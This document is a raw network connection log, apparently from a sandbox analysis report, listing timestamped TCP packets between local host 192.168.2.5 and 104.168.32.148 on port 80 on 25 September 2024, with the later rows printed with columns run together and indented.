Sep 25, 2024 18:50:19.381023884 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399663925 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399682999 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399699926 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399712086 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399724960 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399738073 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399743080 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399764061 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399774075 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399784088 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399787903 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399800062 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399812937 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399822950 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399833918 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399835110 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399844885 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399857044 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399872065 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399872065 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399884939 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399907112 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399923086 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399933100 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399945021 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.399966955 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.399996042 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.400083065 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.400094032 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.400105953 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.400125027 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.400228024 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.400248051 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.400266886 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.447832108 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486041069 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486056089 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486126900 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486145973 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486149073 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486162901 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486218929 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486274004 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486285925 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486299038 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486309052 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486321926 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486325026 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486363888 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486365080 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486390114 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486402035 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486413002 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486423969 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486435890 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486438036 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486473083 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486532927 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486546040 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486562014 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486582041 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486605883 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486613035 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486624956 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486638069 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486664057 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486711025 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486741066 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486747026 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486754894 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486871004 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486881971 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486892939 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486903906 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486917019 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486937046 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486946106 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.486949921 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.486963034 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487000942 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487082005 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487123966 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487134933 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487174034 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487195015 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487205982 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487216949 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487247944 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487320900 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487368107 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487380028 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487413883 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487437010 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487448931 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487461090 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487476110 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487488031 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487505913 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487633944 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487644911 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487656116 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487665892 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487678051 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487685919 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487689018 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487701893 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487708092 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487718105 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487737894 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487754107 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487761974 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.487766027 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.487818003 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488115072 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488157988 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488171101 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488209009 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488214016 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488228083 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488269091 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488290071 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488301039 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488316059 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488336086 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488353968 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488379002 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488389969 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488400936 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488414049 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488426924 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488456011 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488502026 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488512039 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488523960 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488542080 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488550901 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488559961 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488570929 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488578081 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488583088 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488596916 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488624096 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488651037 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488725901 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488737106 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488749027 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488759995 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488774061 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.488775969 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488795996 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.488979101 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489036083 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489211082 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489227057 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489238977 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489244938 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489253044 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489264965 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489272118 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489276886 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489283085 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489293098 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489304066 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489315987 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489339113 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489438057 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489438057 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489470005 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489510059 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489521980 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489537001 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489556074 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489644051 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489655018 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489661932 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489675045 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489700079 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489721060 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489795923 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489806890 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489818096 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489829063 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489840031 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489852905 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489856005 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489869118 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489881039 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489895105 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.489914894 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.489914894 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.541604996 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.574778080 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574814081 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574826002 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574836016 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574856997 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574867964 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574872017 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.574881077 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574893951 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574907064 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574922085 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.574961901 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574971914 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.574975014 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574987888 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.574995041 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575005054 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575020075 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575025082 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575031996 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575134039 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575218916 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575229883 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575242996 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575254917 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575272083 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575287104 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575351954 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575365067 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575402975 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575465918 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575541973 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575552940 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575563908 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575582981 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575591087 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575594902 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575607061 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575624943 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575629950 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575638056 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575643063 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575649977 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575678110 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575728893 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575740099 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575746059 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575752020 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575761080 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575766087 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575773001 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575790882 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575793982 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575793982 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575808048 CEST  49708        80         192.168.2.5     104.168.32.148
Sep 25, 2024 18:50:19.575814962 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575824976 CEST  80           49708      104.168.32.148  192.168.2.5
Sep 25, 2024 18:50:19.575835943 CEST  80           49708      104.168.32.148  192.168.2.5
                                                Sep 25, 2024 18:50:19.575846910 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.575864077 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.575865984 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.575879097 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.575891972 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.575932980 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.575932980 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576139927 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576152086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576163054 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576173067 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576178074 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576183081 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576194048 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576196909 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576205969 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576234102 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576237917 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576248884 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576251984 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576261044 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576273918 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576277018 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576287985 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576303959 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576378107 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576389074 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576407909 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576419115 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576428890 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576436043 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576442003 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576450109 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576453924 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576464891 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576515913 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576540947 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576550961 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576562881 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576586008 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576612949 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576623917 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576636076 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576647997 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576653004 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576683044 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576874971 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576884985 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576894999 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576905966 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576916933 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576917887 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576931000 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576945066 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.576976061 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576976061 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.576999903 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577121973 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577135086 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577183962 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577214003 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577224970 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577235937 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577246904 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577259064 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577270031 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577270031 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577284098 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577285051 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577297926 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577305079 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577331066 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577451944 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577464104 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577482939 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577493906 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577497005 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577506065 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577517033 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577529907 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577533007 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577547073 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577558994 CEST8049708104.168.32.148192.168.2.5
                                                Sep 25, 2024 18:50:19.577568054 CEST4970880192.168.2.5104.168.32.148
                                                Sep 25, 2024 18:50:19.577569962 CEST8049708104.168.32.148192.168.2.5
